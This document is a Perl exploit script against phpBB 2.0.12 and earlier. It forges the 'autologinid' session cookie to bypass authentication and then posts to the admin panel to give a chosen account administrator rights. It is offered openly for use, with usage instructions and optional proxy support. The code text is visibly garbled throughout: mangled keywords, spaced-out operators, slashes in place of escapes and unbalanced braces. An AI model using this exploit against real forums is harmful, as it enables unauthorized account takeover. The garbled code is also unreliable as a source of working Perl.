PHPBB <= 2.0.12 Change User Rights Authentication Bypass

#! / usr / bin / perl -w

# phpbb <= 2.0.12 Session Autologin Exploit

# This script usees the Vulerability in Autologinid Variable

# More: http://www.phpbb.com/phpbb/viewtopic.php?f=14&t=267563

#

# Just Gives An User ON Vulnerable Forum Administrator Rights.

# You shouth register the user before using this ;-)

# by kutas, kutas@mail15.com

# P.s. I dont know who had name an Original Exploit, SO i Cannot Place No (c) Here ...

# But Greets Goes to Painterist Who Made An Explloit for Firefox Cookies ...

IF (@argv <3)

{

Print Q

USAGE: Perl Nenu.pl [Site] [PHPBB Folder] [UserName] [Proxy (optional)]

I.E. perl Nenu.pl www.site.com / forum / bigadmin 127.0.0.1:3128

);

EXIT;

}

Use strict;

Use lwp :: use of useage;

MY $ host = $ argv [0];

MY $ PATH = $ Argv [1];

MY $ user = $ argv [2];

MY $ proxy = $ argv [3];

MY $ request = "http: //";

$ request. = $ host;

$ Request. = $ PATH;

Use http :: cookies;

MY $ Browser = LWP :: UseRagent-> new ();

MY $ cookie_jar = http :: cookies-> new ();

$ Browser-> cookie_jar ($ cookie_jar);

$ cookie_jar-> set_cookie ("0", "phpbb2mysql_data", "A% 3A2% 3A% 7BS% 3A11% 3A% 22autologinid% 22% 3B% 3A1% 3BS% 3A6% 3A% 22UserID% 22% 3BS% 3A1% 3A % 222% 22% 3B% 7D "," / ", $ Host ,,,,); if (defined $ proxy) {

$ proxy = ~ s / (http:) // EG;

$ Browser-> Proxy ("http", "http:// $ proxy");

}

Print " / N";

Print "Trying to Connect to $ Host $ PATH"; if ($ proxy) {print "Using proxy $ proxy";

MY $ response = $ browser-> get ($ request);

Die "Error:", $ response-> status_line

Unless $ response-> is_success;

IF ($ response-> content = ~ m / phpbprivmsg /) {

Print "/ n forum is vulnerable !!! / n";

} else {

Print "sorry ... not vulnerable"; exit ();

Print " / NTRYING TO GET The USER: $ User ID ... / N";

$ response-> content = ~ / sID = ([/ w / d] *) /;

MY $ SID = $ 1;

$ Request. = "admin // admin_ug_auth.php? mode = user & sid = $ sID";

$ response = $ browser-> POST

$ Request,

[

'Username' => $ USER,

'Mode' => 'Edit',

'Mode' => 'User',

'SubmitUser' => 'Look Up User'

],

);

Die "Error:", $ response-> status_line

Unless $ response-> is_success;

IF ($ response-> content = ~ / name = "u" value = "([/ d] *)" /)

{Print "DONE ... ID = 1 / n / N";} else {print "no user $ user found ..."; exit ();

MY $ uid = $ 1;

Print "Trying to Give User: $ User Admin Status ... / N";

$ response = $ browser-> POST

$ Request,

[

'userlevel' => 'admin',

'Mode' => 'User',

'ADV' => '',

'u' => $ uid,

'Submit' => 'Submit'

],

);

Die "Error:", $ response-> status_line

Unless $ response-> is_success;

Print "Well Done !!! $ User Should Now Have An Admin Status ../ n ";